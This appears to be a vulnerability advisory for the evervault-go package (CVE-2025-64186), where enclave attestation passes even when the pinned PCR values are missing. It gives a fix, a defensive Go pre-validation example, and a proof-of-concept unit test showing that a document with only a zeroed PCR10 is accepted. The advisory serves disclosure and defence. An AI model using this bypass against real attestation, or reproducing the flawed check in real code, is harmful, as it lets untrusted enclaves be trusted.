Improper Verification of Cryptographic Signature Affecting github.com/evervault/evervault-go package, versions <1.3.2


Severity

CVSS assessment by Snyk's Security Team.

Threat Intelligence

Exploit Maturity
Proof of Concept

  • Snyk ID: SNYK-GOLANG-GITHUBCOMEVERVAULTEVERVAULTGO-13924193
  • Published: 13 Nov 2025
  • Disclosed: 12 Nov 2025
  • Credit: JoranHonig

Introduced: 12 Nov 2025

CVE-2025-64186
CWE-347

How to fix?

Upgrade github.com/evervault/evervault-go to version 1.3.2 or higher.

Overview

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature because the attestation verification process validates attestation documents incompletely. The PCR comparison does not fail when the document lacks the PCRs the client has pinned, so an attacker can present a document with missing or incomplete PCR values (in the PoC below, a document carrying only an all-zero PCR10 while the client expects PCR0, PCR1, PCR2 and PCR8) and cause the client to trust an enclave that does not meet the expected integrity guarantees.

Note: This is only exploitable if the application is attesting enclaves hosted outside of the default environment and does not itself check that every required PCR is present and valid.

Workaround

This vulnerability can be mitigated by changing the application logic to fail verification unless PCR8 is explicitly present and non-empty, and/or by adding custom pre-validation that rejects any attestation document omitting a required PCR before the PCR values are compared.
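The following is an added example of that pre-validation step, written for this page and not taken from evervault-go or nitrite. To stay self-contained it models only the parts of the two libraries it needs: a stand-in Document type holding the same map[uint][]byte PCR map that nitrite.Document exposes, and an ExpectedPCRs struct with the same hex-string fields as attestation.PCRs. The function names (PreValidate, StrictVerifyPCRs) and the sample documents are assumptions constructed for the example; the expected PCR values are the ones used in the PoC.

```go
package main

import (
	"bytes"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Document stands in for nitrite.Document (assumption: only the PCRs map is
// modelled; the real type also carries the signed COSE payload fields).
type Document struct {
	PCRs map[uint][]byte
}

// ExpectedPCRs mirrors the shape of attestation.PCRs: lowercase hex strings,
// "" meaning "not pinned by the caller".
type ExpectedPCRs struct {
	PCR0, PCR1, PCR2, PCR8 string
}

// pinned returns index -> expected hex for every PCR the caller actually set.
func (e ExpectedPCRs) pinned() map[uint]string {
	out := map[uint]string{}
	for idx, v := range map[uint]string{0: e.PCR0, 1: e.PCR1, 2: e.PCR2, 8: e.PCR8} {
		if v != "" {
			out[idx] = v
		}
	}
	return out
}

// PreValidate is the "reject documents that omit any required PCR" step:
// every pinned PCR must be present and must not be empty or all zeros
// (an unmeasured PCR; for PCR8 that typically means an unsigned image).
func PreValidate(doc Document, exp ExpectedPCRs) error {
	req := exp.pinned()
	if len(req) == 0 {
		return errors.New("no PCRs pinned; refusing to verify against an empty policy")
	}
	for idx := range req {
		got, ok := doc.PCRs[idx]
		if !ok {
			return fmt.Errorf("attestation document omits PCR%d", idx)
		}
		if len(got) == 0 || bytes.Equal(got, make([]byte, len(got))) {
			return fmt.Errorf("PCR%d is empty or zeroed", idx)
		}
	}
	return nil
}

// StrictVerifyPCRs accepts the document only if some candidate set passes
// PreValidate and every PCR pinned in it matches the document byte for byte,
// so a document that simply leaves the pinned PCRs out can never be accepted.
func StrictVerifyPCRs(candidates []ExpectedPCRs, doc Document) (bool, error) {
	if len(candidates) == 0 {
		return false, errors.New("no candidate PCR sets supplied")
	}
	var lastErr error
	for _, exp := range candidates {
		if err := PreValidate(doc, exp); err != nil {
			lastErr = err
			continue
		}
		if pcrsEqual(exp, doc) {
			return true, nil
		}
		lastErr = errors.New("PCR values differ from every expected set")
	}
	return false, lastErr
}

func pcrsEqual(exp ExpectedPCRs, doc Document) bool {
	for idx, want := range exp.pinned() {
		wantBytes, err := hex.DecodeString(want)
		if err != nil || !bytes.Equal(wantBytes, doc.PCRs[idx]) {
			return false
		}
	}
	return true
}

// pcrHex builds a 48-byte (SHA-384 sized) PCR value ending in the given byte,
// the same pattern the PoC uses for its expected values.
func pcrHex(last byte) string { return strings.Repeat("00", 47) + fmt.Sprintf("%02x", last) }

// PoCPolicy is the expected-PCR set from the PoC (PCR0..2 and PCR8 pinned).
func PoCPolicy() []ExpectedPCRs {
	return []ExpectedPCRs{{PCR0: pcrHex(1), PCR1: pcrHex(2), PCR2: pcrHex(3), PCR8: pcrHex(4)}}
}

// PoCDocument is the PoC's constructed document: only PCR10, all zeros.
func PoCDocument() Document { return Document{PCRs: map[uint][]byte{10: make([]byte, 32)}} }

// GoodDocument is a constructed document that genuinely matches PoCPolicy.
func GoodDocument() Document {
	d := Document{PCRs: map[uint][]byte{}}
	for idx, h := range PoCPolicy()[0].pinned() {
		d.PCRs[idx], _ = hex.DecodeString(h)
	}
	return d
}
```

StrictVerifyPCRs(PoCPolicy(), PoCDocument()) returns false with an "omits PCR" error, which is the outcome the PoC shows the vulnerable comparison failing to produce; the same policy accepts GoodDocument() and rejects it again as soon as PCR8 is deleted or zeroed. The check is written to fail closed: an empty policy or an empty candidate list is an error, not a pass.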

PoC

package evervault

import (
	"testing"

	"github.com/hf/nitrite"
	"github.com/stretchr/testify/assert"

	"github.com/evervault/evervault-go/attestation"
)

// Lives in package evervault because verifyPCRs is unexported.
func TestVulnerableCompare(t *testing.T) {
	assert := assert.New(t)

	// arrange: the client pins PCR0, PCR1, PCR2 and PCR8 to known values
	expectedPCRs := []attestation.PCRs{
		{
			PCR0: "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001",
			PCR1: "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002",
			PCR2: "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003",
			PCR8: "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004",
		},
	}
	// the attestation document carries none of the pinned PCRs: only PCR10, all zeros
	actualDocument := nitrite.Document{}
	actualDocument.PCRs = map[uint][]byte{
		10: make([]byte, 32),
	}

	// act
	v := verifyPCRs(expectedPCRs, actualDocument)

	// assert: verification should not pass, but in affected versions it does
	assert.Equal(true, v)
}
